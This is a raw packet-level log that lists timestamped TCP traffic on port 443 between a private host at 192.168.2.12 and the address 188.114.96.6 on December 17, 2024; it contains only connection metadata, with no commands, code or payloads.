                                                                        Dec 17, 2024 08:38:31.946266890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.946325064 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.953201056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.953221083 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.953289986 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.953299046 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.953355074 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.959506035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.959536076 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.959621906 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.959628105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:31.959664106 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:31.959681034 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.104209900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.104227066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.104374886 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.104393005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.104433060 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.111617088 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.111645937 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.111721992 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.111731052 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.111759901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.111780882 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.117502928 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.117531061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.117572069 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.117580891 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.117619991 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.117640972 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.124644041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.124664068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.124717951 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.124730110 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.124780893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.131700993 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.131726980 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.131773949 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.131788969 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.131833076 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.138540983 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.138561010 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.138619900 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.138631105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.138670921 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.138686895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.145437002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.145453930 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.145528078 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.145534992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.145572901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.151707888 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.151729107 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.151779890 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.151788950 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.151869059 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.296562910 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.296602011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.297883034 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.297902107 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.298110008 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.303575039 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.303607941 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.304316998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.304342985 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.307682991 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.310662985 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.310709953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.310914993 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.310914993 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.310921907 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.311368942 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.316926956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.316958904 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.317179918 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.317193985 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.317308903 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.324028015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.324065924 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.324183941 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.324183941 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.324192047 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.324292898 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.330667973 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.330687046 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.330964088 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.330971956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.331269979 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.337734938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.337754965 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.339303970 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.339303970 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.339328051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.339876890 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.344876051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.344908953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.345208883 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.345220089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.345381021 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.488867998 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.488894939 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.489054918 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.489054918 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.489070892 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.489690065 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.495860100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.495892048 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.496018887 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.496018887 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.496028900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.496288061 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.502995968 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.503021955 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.503163099 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.503163099 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.503171921 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.503552914 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.509260893 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.509282112 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.509562969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.509571075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.509754896 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.516458988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.516479015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.516820908 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.516843081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.517079115 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.523025990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.523047924 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.523175001 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.523199081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.526473999 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.530041933 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.530081034 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.530175924 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.530175924 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.530191898 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.530299902 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.537432909 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.537460089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.537674904 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.537687063 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.537957907 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.681077003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.681103945 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.681189060 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.681204081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.681548119 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.688158035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.688177109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.688451052 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.688472033 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.688589096 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.695250988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.695275068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.695633888 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.695652008 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.695734024 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.701447964 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.701472044 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.701606989 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.701628923 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.701711893 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.701786995 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.708678961 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.708698988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.708900928 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.708923101 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.709762096 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.715333939 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.715351105 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.715632915 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.715650082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.715980053 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.722713947 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.722743034 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.723297119 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.723359108 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.723617077 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.729414940 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.729437113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.729837894 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.729876041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.730402946 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.873615026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.873641968 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.873862982 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.873884916 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.874075890 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.880686998 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.880707979 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.880882978 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.880901098 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.881206036 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.887685061 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.887727022 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.888238907 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.888238907 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.888257980 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.891339064 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.894016981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.894033909 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.894166946 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.894181013 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.894545078 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.901057005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.901074886 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.901369095 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.901386023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.902641058 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.907731056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.907746077 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.908001900 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.908020020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.908191919 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.914941072 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.914956093 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.915096998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.915117979 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.915271044 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.921945095 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.921960115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.922173023 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:32.922189951 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:32.922435999 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.062760115 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.063780069 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.063816071 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.069365025 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.069381952 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.069925070 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.069925070 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.069938898 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.076471090 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.076491117 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.076755047 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.076769114 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.083631039 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.083651066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.083707094 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.083725929 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.083762884 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.089833975 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.089859009 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.089943886 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.089962006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.089989901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.096456051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.096476078 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.096590042 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.096590042 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.096604109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.103652000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.103672981 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.103981018 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.103990078 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.110635042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.110666037 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.110888958 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.110888958 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.110898018 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.255137920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.255158901 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.255233049 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.255253077 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.255254984 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.262293100 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.262301922 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.262341022 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.262351990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.262357950 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.262358904 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.262396097 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.262396097 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.262403011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.262409925 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.262425900 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.262465954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.268400908 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.268409967 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.268455982 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.268465996 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.268484116 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.268508911 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.268508911 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.275661945 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.275686979 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.275734901 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.275748014 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.275784969 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.283025026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.283041954 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.283117056 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.283133030 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.283178091 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.289268970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.289289951 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.289361000 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.289361000 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.289374113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.296550989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.296576977 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.296627998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.296643972 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.296663046 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.302815914 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.302828074 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.302892923 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.302906036 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.302932978 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.447478056 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.447508097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.447715998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.447736025 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.453926086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.453939915 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.453974962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.453988075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.453995943 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.454092979 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.454173088 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.454173088 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.454191923 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.470225096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.470238924 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.470257044 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.470304966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.470309973 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.470390081 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:33.470396042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.470743895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.470752001 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:33.470779896 CET44349716188.114.96.6192.168.2.12
